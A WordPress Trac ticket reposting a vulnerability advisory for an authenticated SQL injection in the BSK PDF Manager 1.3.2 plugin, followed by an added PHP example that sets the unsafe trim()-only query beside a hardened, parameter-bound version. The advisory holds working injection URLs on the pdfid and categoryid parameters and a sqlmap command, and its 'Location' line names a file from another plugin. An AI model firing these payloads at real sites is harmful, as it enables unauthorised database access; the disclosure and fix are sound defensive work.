[wp-trac] [WordPress Trac] #28869: Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
WordPress Trac
noreply at wordpress.org
Sun Jul 13 04:03:48 UTC 2014
#28869: Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
---------------------------+-----------------------------
Reporter: varunchowdary | Owner:
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version: trunk
Severity: normal | Keywords:
Focuses: |
---------------------------+-----------------------------
#######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : varunchowdary
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :

[claudio at localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid']) &&$_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id = trim($_GET['pdfid']);

$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################
Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u"http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid
--
Ticket URL: <https://core.trac.wordpress.org/ticket/28869>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
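
The trim()-only handling of categoryid and pdfid reported in this ticket, set beside a hardened form, as an added example that is not code from the plugin or from the reporter. The table demo_cats, the query shape and both function names are assumptions, since the ticket does not show the plugin's SQL; PDO with in-memory SQLite is used so the script runs outside WordPress, where absint() and $wpdb->prepare() with a %d placeholder fill the same two roles.

```php
<?php
// Added example: constructed schema and data. The plugin's real query is not
// shown in the ticket, so the table and the statement below are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE demo_cats (id INTEGER PRIMARY KEY, cat_title TEXT)');
$db->exec("INSERT INTO demo_cats (id, cat_title) VALUES (1, 'Manuals')");

// Pattern from the ticket: trim() only strips whitespace, so SQL text survives.
function find_category_unsafe(PDO $db, string $raw): array
{
    $category_id = trim($raw);
    // Assumed query shape: the request value is concatenated into the statement.
    $sql = 'SELECT id, cat_title FROM demo_cats WHERE id = ' . $category_id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function find_category_safe(PDO $db, string $raw): array
{
    $id = filter_var(trim($raw), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('categoryid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, cat_title FROM demo_cats WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// First input is a normal id; the second is the value quoted in the ticket.
foreach (['1', '1 and 1=2'] as $input) {
    $label = "'" . $input . "'";
    printf("input %-12s unsafe rows: %d\n", $label, count(find_category_unsafe($db, $input)));
    try {
        printf("input %-12s safe rows:   %d\n", $label, count(find_category_safe($db, $input)));
    } catch (InvalidArgumentException $e) {
        printf("input %-12s rejected:    %s\n", $label, $e->getMessage());
    }
}
```

The unsafe function lets the request value change the WHERE clause, while the hardened one never passes request text to the SQL parser.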